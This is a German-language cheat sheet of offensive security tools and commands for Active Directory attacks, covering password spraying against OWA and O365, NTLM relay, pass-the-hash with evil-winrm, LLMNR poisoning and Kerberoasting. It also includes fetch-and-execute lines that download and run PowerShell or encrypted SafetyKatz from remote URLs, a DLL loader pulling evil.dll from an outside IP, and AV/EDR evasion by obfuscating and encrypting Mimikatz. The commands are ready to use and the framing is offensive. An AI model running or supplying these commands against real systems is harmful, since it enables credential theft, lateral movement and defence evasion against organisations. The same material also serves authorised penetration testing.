
Kuratierte Sammlung von offensiven Sicherheitstools und -befehlen für Active-Directory-Angriffe, C2, Privilege Escalation, Verschleierung und Web-Pentesting.
https://github.com/S3cur3Th1sSh1t/WinPwn
Import-Module .\WinPwn.ps1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
Seatbelt, KeeThief, Rubeus, SharpUp ...
PowerView, PowerUp, Get-GPPPassword ...
SharpHound.exe -d testdomain.com -c all,gpolocalgroup
Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup
bloodhound.py -c all
So führen Sie ADRecon auf einem Domänenmitglieds-Host aus.
PS C:\> .\ADRecon.ps1
So führen Sie ADRecon auf einem Domänenmitglieds-Host als anderer Benutzer aus.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>
So führen Sie ADRecon auf einem Nicht-Mitglieds-Host über LDAP aus.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>
Lync/Skype- & OWA-Sprayer, Wordlist-Generator, Namensschema-Konverter usw.
OWA-Spraying
./atomizer.py owa contoso.com 'Fall2018' emails.txt
Lync-Spraying
./atomizer lync contoso.com --user-as-pass usernames.txt
Recon-Modus
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
OWA & EWS angreifen
Das Namensschema sollte wie testdomain.com\schmidta oder aschmidt aussehen -> Schema mit dem msf-Modul prüfen
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt
Get-ADUsernameFromEWS -EmailList email-list.txt
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt
O365-Enum- & Spray-Tool
Nur Benutzer enumerieren, ohne zu sprayen. Benötigt eine Textdatei mit vollständigen E-Mail-Adressen im Format [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose
O365-Sprayer
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
EWS über NTLM-Authentifizierung per HTTP angreifen.
./exchangeRelayx.py -t https://mail.quickbreach.com
Portierung von PowerView auf .NET
SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password
E-Mail-Adressen / Benutzer sammeln
python3 crosslinked.py -f '{first}.{last}@domain.com' company_name
Offizielle Doku: https://mpgn.gitbook.io/crackmapexec/
Ein Tool zur Interaktion mit Microsofts WS-Management-Implementierung, auch bekannt als Powershell-Remoting, von einem Linux-Rechner aus.
Kann auch verwendet werden, um sich mit einem Hash anstelle eines Passworts zu verbinden.
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099
Kann danach auch C#, DLLs oder Donut-Shellcode direkt im Speicher ausführen. Die ausführbaren Dateien müssen sich in dem Pfad befinden, der mit dem Argument -e festgelegt wurde.
Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'
Dll-loader -http -path http://10.11.12.13/evil.dll
Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin
Kann auch AMSI umgehen, Kerberos-Tickets abrufen und so weiter ...
Führt Aktionen über RDP aus. Der Benutzer erhält eine Benachrichtigung, wenn Multi-RDP nicht aktiviert ist!
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
PowerShell-ADIDNS/LLMNR/mDNS/NBNS/DNS-Spoofer und Man-in-the-Middle-Tool
Import-Module Inveigh.psm1
Invoke-Inveigh -Consoleoutput Y
LLMNR/NBT-NS/mDNS-Poisoner
./Responder.py -I eth0
Exploits für Linux & Windows
PowerShell ohne PowerShell
rundll32 PowerShdll,main -w
C/C++-Binaries obfuskieren
Neues Modul -> ShellCode fluctuation:
PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'
Fork des Donut-Shellcode-/PE-Generators mit Syscalls
C/C++-Binaries obfuskieren
Obfuskator für PowerShell-Skripte.
Sammlung von Tools zur Umgehung von AV/EDR und Ähnlichem
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100
Obfuskator und Verschlüsselungstool für PowerShell-Skripte.
Toolsammlung für PowerShell ISE. Obfuskationsmöglichkeiten.
Konvertiert PS1 in eine EXE-Datei.
Ein Wrapper für C#-Binaries, der die Payload verschlüsselt und im Speicher entschlüsselt.
Binärdatei verschlüsseln:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
Verschlüsselte Binärdatei von URL laden:
Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs
Verschlüsselte Binärdatei von der Festplatte mit Befehlszeilenargumenten laden:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Obfuskator für C# und PowerShell
Obfuskator für PowerShell-Skripte
Obfuskator für C#-Assemblies
Obfuskator für C#-Assemblies
Shellcode-Loader über D-Invoke
Obfuskator für C/C++-Quellcode
SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray